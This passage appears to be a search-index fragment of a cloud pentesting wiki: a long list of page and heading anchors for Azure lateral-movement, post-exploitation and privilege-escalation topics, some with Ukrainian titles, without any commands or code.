ass-the-cookie.html#az---pass-the-cookie","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#Чому-куки","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#Атака","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#az---pass-the-certificate","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#pass-the-certificate-azure","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#Посилання","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#az---pass-the-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Що-таке-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Перевірте-чи-маєте-ви-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#prt-cookie","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Потік-куки-prt-з-використанням-tpm","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Сценарії-зловживання-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Приклади-атак-pass-the-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Атака---roadtoken","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#attack---using-roadrecon","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#attack---using-aadinternals-and-a-leaked-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Атака---mimikatz","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Посилання","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.html#az---Фішинг-первинного-токена-оновлення-microsoft-entra","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.html#az---processes-memory-access-token","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.html#Основна-інформація","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#az---primary-refresh-token-prt","pentesting-cloud/azure-security/az-post-exploitation/index.html#az---Постексплуатація","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#az---blob-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#storage-privesc","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#microsoftstoragestorageaccountsblobservicescontainersblobsread","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#microsoftstoragestorageaccountsblobservicescontainersblobswrite","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#az---cosmosdb-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#cosmosdb-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsread--microsoftdocumentdbdatabaseaccountswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersread--microsoftdocumentdbdatabaseaccountssqldatabasescontainerswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabaseswrite--microsoftdocumentdbdatabaseaccountssqldatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsfailoverprioritychangeaction","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsregeneratekeyaction","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersuserdefinedfunctionswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainersuserdefinedfunctionsread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersstoredprocedureswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainersstoredproceduresread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainerstriggerswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainerstriggersread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsmongodbdatabasescollectionsread--microsoftdocumentdbdatabaseaccountsmongodbdatabasescollectionswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsmongodbdatabaseswrite--microsoftdocumentdbdatabaseaccountsmongodbdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#az---file-share-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesread","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#microsoftstoragestorageaccountsfileservicesfilesharesfileswrite-microsoftstoragestorageaccountsfileserviceswritefilebackupsemanticsaction","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.html#az---function-apps-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.html#funciton-apps-post-exploitaiton","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#az---key-vault-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#azure-key-vault","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsgetsecretaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultscertificatespurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysencryptaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysdecryptaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeyspurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretspurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretssetsecretaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultscertificatesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsrestoreaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysrecoveraction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#az---logic-apps-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#logic-apps-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftlogicworkflowsread-microsoftlogicworkflowswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesread-microsoftwebsiteswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesstopaction-microsoftwebsitesstartaction--microsoftwebsitesrestartaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesconfiglistaction-microsoftwebsitesread--microsoftwebsitesconfigwrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftlogicintegrationaccountswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountsbatchconfigurationswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountsmapswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountspartnerswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountssessionswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftlogicworkflowsregenerateaccesskeyaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#az---mysql-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#mysql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversdatabaseswrite--microsoftdbformysqlflexibleserversdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversbackupswrite","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversadvancedthreatprotectionsettingswrite","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversfirewallruleswrite","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversresetgtidaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversupdateconfigurationsaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversread-microsoftdbformysqlflexibleserverswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversstopaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversstartaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#az---postgresql-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#postgresql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversdatabaseswrite--microsoftdbforpostgresqlflexibleserversdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversbackupswrite","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversadvancedthreatprotectionsettingswrite--microsoftdbforpostgresqlflexibleserversadvancedthreatprotectionsettingsread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversfirewallruleswrite-microsoftdbforpostgresqlflexibleserversread--microsoftdbforpostgresqlflexibleserversfirewallrulesread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversconfigurationswrite--microsoftdbforpostgresqlflexibleserversconfigurationsread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversstopaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversstartaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversread-microsoftdbforpostgresqlflexibleserverswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#az---queue-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#queue","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesread","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesprocessaction","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesaddaction","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessageswrite","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#actions-microsoftstoragestorageaccountsqueueservicesqueuesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#Дії-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#Посилання","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#az---service-bus-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#service-bus","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Дії-microsoftservicebusnamespacesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Дії-microsoftservicebusnamespacestopicsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Дії-microsoftservicebusnamespacesqueuesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Дії-microsoftservicebusnamespacestopicssubscriptionsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Дії-microsoftservicebusnamespacesqueueswrite-microsoftservicebusnamespacesqueuesread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Дії-microsoftservicebusnamespacestopicswrite-microsoftservicebusnamespacestopicsread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Дії-microsoftservicebusnamespacestopicssubscriptionswrite-microsoftservicebusnamespacestopicssubscriptionsread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Дії-authorizationrules-Відправка-та-отримання-повідомлень","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Посилання","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#az---table-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#table-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#microsoftstoragestorageaccountstableservicestablesentitiesread","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#microsoftstoragestorageaccountstableservicestablesentitieswrite--microsoftstoragestorageaccountstableservicestablesentitiesaddaction--microsoftstoragestorageaccountstableservicestablesentitiesupdateaction","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#az---sql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#sql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesread-microsoftsqlserversread--microsoftsqlserversdatabaseswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserverselasticpoolswrite--microsoftsqlserverselasticpoolsread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversauditingsettingsread--microsoftsqlserversauditingsettingswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqllocationsconnectionpoliciesazureasyncoperationread-microsoftsqlserversconnectionpoliciesread--microsoftsqlserversconnectionpolicieswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesexportaction","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesimportaction","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversconnectionpolicieswrite--microsoftsqlserversconnectionpoliciesread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserverskeyswrite--microsoftsqlserverskeysread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesledgerdigestuploadsdisableaction-microsoftsqllocationsledgerdigestuploadsazureasyncoperationread-microsoftsqllocationsledgerdigestuploadsoperationresultsread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasestransparentdataencryptionwrite-microsoftsqllocationstransparentdataencryptionazureasyncoperationread-microsoftsqlserversdatabasestransparentdataencryptionread","pentesting-cloud/azure-security/az-post-exploitation/az-virtual-desktop-post-exploitation.html#az---vms--network-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-virtual-desktop-post-exploitation.html#Віртуальний-робочий-стіл","pentesting-cloud/azure-security/az-post-exploitation/az-virtual-desktop-post-exploitation.html#Загальні-техніки","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#az---vms--network-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#vms--network","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#vm-application-pivoting","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#sensitive-information-in-images","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#Чутлива-інформація-в-точках-відновлення","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#Чутлива-інформація-на-дисках-та-знімках","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#Чутлива-інформація-в-розширеннях-ВМ-та-додатках-ВМ","pentesting-cloud/azure-security/az-privilege-escalation/index.html#az---Підвищення-Привілеїв","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#az---azure-iam-privesc-authorization","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#azure-iam","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationroleassignmentswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationroledefinitionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationelevateaccessaction","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftmanagedidentityuserassignedidentitiesfederatedidentitycredentialswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#az---app-services-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#app-services","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitespublishaction-microsoftwebsitesbasicpublishingcredentialspoliciesread-microsoftwebsitesconfigread-microsoftwebsitesread","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#obtaining-scm-credentials--enabling-basic-authentication","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#publish-code-using-scm-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#webjobs-microsoftwebsitespublishaction--scm-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsiteswrite-microsoftwebsitesread-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitesconfiglistaction","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#read-configured-third-party-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#update-app-code-from-the-source","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesconfigread-microsoftwebsitesconfiglistaction-microsoftwebsitesread","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#az---azure-automation-accounts-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#azure-automation-accounts","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#hybrid-workers-group","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsjobswrite-microsoftautomationautomationaccountsrunbooksdraftwrite-microsoftautomationautomationaccountsjobsoutputread-microsoftautomationautomationaccountsrunbookspublishaction-microsoftresourcessubscriptionsresourcegroupsread-microsoftautomationautomationaccountsrunbookswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsscheduleswrite-microsoftautomationautomationaccountsjobscheduleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountswebhookswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsrunbooksdraftwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountssourcecontrolswrite-microsoftautomationautomationaccountssourcecontrolsread","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsvariableswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#custom-runtime-environments","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#compromising-state-configuration","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#az---azure-container-registry-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#azure-container-registry","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistrieslistcredentialsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriestokenswrite-microsoftcontainerregistryregistriesgeneratecredentialsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistrieslistbuildsourceuploadurlaction-microsoftcontainerregistryregistriesschedulerunaction-microsoftcontainerregistryregistriesrunslistlogsasurlaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriestaskswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriesimportimageaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#az---azure-container-instances-apps--jobs-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#azure-container-instances-apps--jobs","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#aci","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftcontainerinstancecontainergroupsread-microsoftcontainerinstancecontainergroupscontainersexecaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftcontainerinstancecontainergroupswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftresourcessubscriptionsresourcegroupsread-microsoftcontainerinstancecontainergroupswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#aca","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappcontainerappsread-microsoftappmanagedenvironmentsread-microsoftappcontainerappsrevisionsreplicas-microsoftappcontainerappsrevisionsread-microsoftappcontainerappsgetauthtokenaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappcontainerappslistsecretsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappcontainerappswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappcontainerappswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftappmanagedenvironmentsjoinaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#jobs","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappjobsread-microsoftappjobswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappjobsread-microsoftappjobslistsecretsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftappjobswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappmanagedenvironmentsread-microsoftappjobswrite-microsoftappmanagedenvironmentsjoinaction-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappjobsstartaction-microsoftappjobsread","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftcontainerinstancecontainergroupsrestartaction","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#az---cosmosdb-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#cosmosdb-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbdatabaseaccountssqlroledefinitionswrite-microsoftdocumentdbdatabaseaccountssqlroledefinitionsread--microsoftdocumentdbdatabaseaccountssqlroleassignmentswrite-microsoftdocumentdbdatabaseaccountssqlroleassignmentsread","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbdatabaseaccountsmongodbroledefinitionswrite--microsoftdocumentdbdatabaseaccountsmongodbroledefinitionsread-microsoftdocumentdbdatabaseaccountsmongodbuserdefinitionswrite--microsoftdocumentdbdatabaseaccountsmongodbuserdefinitionsread","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbdatabaseaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#az---entraid-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Ролі","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Роль-Адміністратор-привілейованих-ролей","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Застосунки","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationscredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsmyorganizationcredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsallpropertiesupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Сервісні-принципали","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalscredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalssynchronizationcredentialsmanage","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalsdisable-та-enable","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Групи","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsallpropertiesupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsmembersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsdynamicm